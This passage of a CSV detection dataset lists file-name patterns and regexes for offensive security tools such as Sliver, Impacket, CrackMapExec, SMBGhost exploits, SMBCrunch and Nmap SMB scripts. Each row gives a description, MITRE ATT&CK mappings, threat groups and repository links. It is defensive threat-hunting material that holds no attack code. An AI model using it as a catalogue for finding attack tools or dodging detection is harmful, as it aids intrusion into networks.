T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliver.proto*",".{0,1000}\/sliver\.proto.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliver/evasion/*",".{0,1000}\/sliver\/evasion\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliver_pb2.py*",".{0,1000}\/sliver_pb2\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/sliver_pb2_grpc.py*",".{0,1000}\/sliver_pb2_grpc\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/sliver-client.exe*",".{0,1000}\/sliver\-client\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliver-client_linux.sig*",".{0,1000}\/sliver\-client_linux\.sig.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliver-client_windows.exe*",".{0,1000}\/sliver\-client_windows\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliver-client_windows-386*.exe*",".{0,1000}\/sliver\-client_windows\-386.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliver-client_windows-amd64*.exe*",".{0,1000}\/sliver\-client_windows\-amd64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliver-client_windows-arm64*.exe*",".{0,1000}\/sliver\-client_windows\-arm64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliverpb.Exe*",".{0,1000}\/sliverpb\.Exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliver-server*",".{0,1000}\/sliver\-server.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/SlowPathMITM.py*",".{0,1000}\/SlowPathMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/smartbrute.git*",".{0,1000}\/smartbrute\.git.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","1","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*/smartbrute-main*",".{0,1000}\/smartbrute\-main.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*/smb.py*",".{0,1000}\/smb\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/smb/psexec.rb*",".{0,1000}\/smb\/psexec\.rb.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/SMB_RPC/*.py",".{0,1000}\/SMB_RPC\/.{0,1000}\.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/smb2-capabilities.nse*",".{0,1000}\/smb2\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb2-security-mode.nse*",".{0,1000}\/smb2\-security\-mode\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb2-time.nse*",".{0,1000}\/smb2\-time\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb2-vuln-uptime.nse*",".{0,1000}\/smb2\-vuln\-uptime\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb3.py*",".{0,1000}\/smb3\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/smb-brute.nse*",".{0,1000}\/smb\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-cmds.txt*",".{0,1000}\/smb\-cmds\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/SMBCrunch.git*",".{0,1000}\/SMBCrunch\.git.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*/smb-double-pulsar-backdoor.nse*",".{0,1000}\/smb\-double\-pulsar\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/SMBeagle*",".{0,1000}\/SMBeagle.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*/smb-enum-domains.nse*",".{0,1000}\/smb\-enum\-domains\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-enum-groups.nse*",".{0,1000}\/smb\-enum\-groups\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-enum-processes.nse*",".{0,1000}\/smb\-enum\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-enum-services.nse*",".{0,1000}\/smb\-enum\-services\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-enum-sessions.nse*",".{0,1000}\/smb\-enum\-sessions\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-enum-shares.nse*",".{0,1000}\/smb\-enum\-shares\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-enum-users.nse*",".{0,1000}\/smb\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smbexec.py*",".{0,1000}\/smbexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/smbexec.py*",".{0,1000}\/smbexec\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*/smb-flood.nse*",".{0,1000}\/smb\-flood\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/SMBForwarder.txt*",".{0,1000}\/SMBForwarder\.txt.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/SMBGhost/scanner.py*",".{0,1000}\/SMBGhost\/scanner\.py.{0,1000}","offensive_tool_keyword","SMBGhost","Simple scanner for CVE-2020-0796 - SMBv3 RCE.","T1210 - T1573 - T1553 - T1216 - T1027","TA0006 - TA0011 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ollypwn/SMBGhost","1","1","N/A","N/A","7","654","199","2020-10-01T08:36:29Z","2020-03-11T15:21:27Z" "*/SMBGhost_RCE*",".{0,1000}\/SMBGhost_RCE.{0,1000}","offensive_tool_keyword","SMBGhost_RCE_PoC","RCE PoC for CVE-2020-0796 SMBGhost","T1210 - T1059 - T1505 - T1021 - T1027","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/chompie1337/SMBGhost_RCE_PoC","1","1","N/A","N/A","10","1290","349","2020-07-02T18:51:47Z","2020-06-02T00:14:47Z" "*/SMBGrab.pl*",".{0,1000}\/SMBGrab\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*/SMBHunt.pl*",".{0,1000}\/SMBHunt\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*/smbldap.py*",".{0,1000}\/smbldap\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/SMBList.pl*",".{0,1000}\/SMBList\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*/smb-ls.nse*",".{0,1000}\/smb\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smbmap.git*",".{0,1000}\/smbmap\.git.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "*/smbmap.py*",".{0,1000}\/smbmap\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/smbmapDump*",".{0,1000}\/smbmapDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/smb-mbenum.nse*",".{0,1000}\/smb\-mbenum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-os-discovery.nse*",".{0,1000}\/smb\-os\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-print-text.nse*",".{0,1000}\/smb\-print\-text\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-protocols.nse*",".{0,1000}\/smb\-protocols\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-psexec.nse*",".{0,1000}\/smb\-psexec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 